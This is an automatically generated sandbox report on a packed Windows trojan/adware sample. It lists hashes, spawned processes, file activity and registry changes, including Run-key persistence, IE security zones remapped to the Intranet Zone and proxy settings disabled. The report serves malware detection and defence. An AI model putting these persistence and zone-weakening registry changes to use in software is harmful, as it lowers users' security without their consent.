Trojan.Win32.Generic!BT (VIPRE), Artemis!49ECEA57D92B (McAfee), MicroNames Ltd.481 (AVG), Win32:Adware-ADK [PUP] (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, PUP, Adware
This description was automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 49ecea57d92bc3f004d63a13998ed827
SHA1: c02e6913d58fc61b5e381e597af8baa43f151b16
SHA256: 5cdc46a6eee9fbb7e05daccafa50829771d35357667e30d7f5d530795148080f
SSDeep: 24576:5cgCYQ1LGum4sx8Kofd/uV wPZA7fGJUJd:egCh1LGumhuW MZAzGi3
Size: 837272 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-11-06 21:53:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2700
WinCtrCon.exe:2684
WinCtrCon.exe:2880
WinCtrProc.exe:2352
WinCtrProc.exe:1992
WinCtrProc.exe:2504
WinCtrProc.exe:1764
irsetup.exe:2560
The Trojan injects its code into the following process(es):
No processes have been created.
File activity
The process %original file name%.exe:2700 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
The process WinCtrCon.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\sTakeList[1].htm (917 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF4DA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (0 bytes)
The process WinCtrCon.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (409017 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF3B7E.tmp (0 bytes)
The process WinCtrProc.exe:2352 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF2076.tmp (0 bytes)
The process WinCtrProc.exe:1992 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA42A.tmp (0 bytes)
The process WinCtrProc.exe:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\background_gradient[1] (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\down[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[2] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\Uninstall_Ctr[1].exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\ErrorPageTemplate[1] (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (0 bytes)
The process WinCtrProc.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (3 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (453 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF252.tmp (0 bytes)
The process irsetup.exe:2560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
Registry activity
The process %original file name%.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process WinCtrCon.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 44 CB 87 32 31 D1 EA 1E FE 3F 07 20 89 FA 11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"MomDate" = "5/24/2014"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -oJzqEOx"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -oJzqEOx"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
"ProxyOverride"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"
The process WinCtrCon.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}]
"(Default)" = "DInetEvents"
[HKCU\Software\WinCtrView]
"Upmom" = "N"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS]
"(Default)" = "2"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"
[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"
[HKCU\Software\WinCtrView]
"firstTime" = "0"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCU\Software\WinCtrView]
"Commit" = "N"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}]
"(Default)" = "IInet"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKCU\Software\WinCtrView]
"Version" = "1423"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR]
"(Default)" = ""
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
"(Default)" = "InetCtls.Inet"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 31 E1 96 2D 96 64 AF 62 86 BF CD AE A1 7D F8"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"MomDate" = "5/24/2014"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe -DYOFTdMM"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"
The process WinCtrProc.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 2B CB 83 13 12 A0 9A 71 E4 36 D3 FA 9A D2 ED"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process WinCtrProc.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 A8 29 71 67 C8 1D E6 4D E0 05 F9 7A 8B 4E 07"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process WinCtrProc.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 38 14 B2 82 9A 4C 6F C7 C7 35 B2 0B AB F0 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\WinCtrView]
"ver" = "sup"
"Actdate" = "5/24/2014"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\WinCtrView]
"Commit" = "Y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"USER_NO" = "3207"
"firstTime" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
The process WinCtrProc.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 27 82 26 2B A7 36 84 1A FC BE BE 81 BC 26 D6"
[HKCU\Software\WinCtrView]
"Upmom" = "Y"
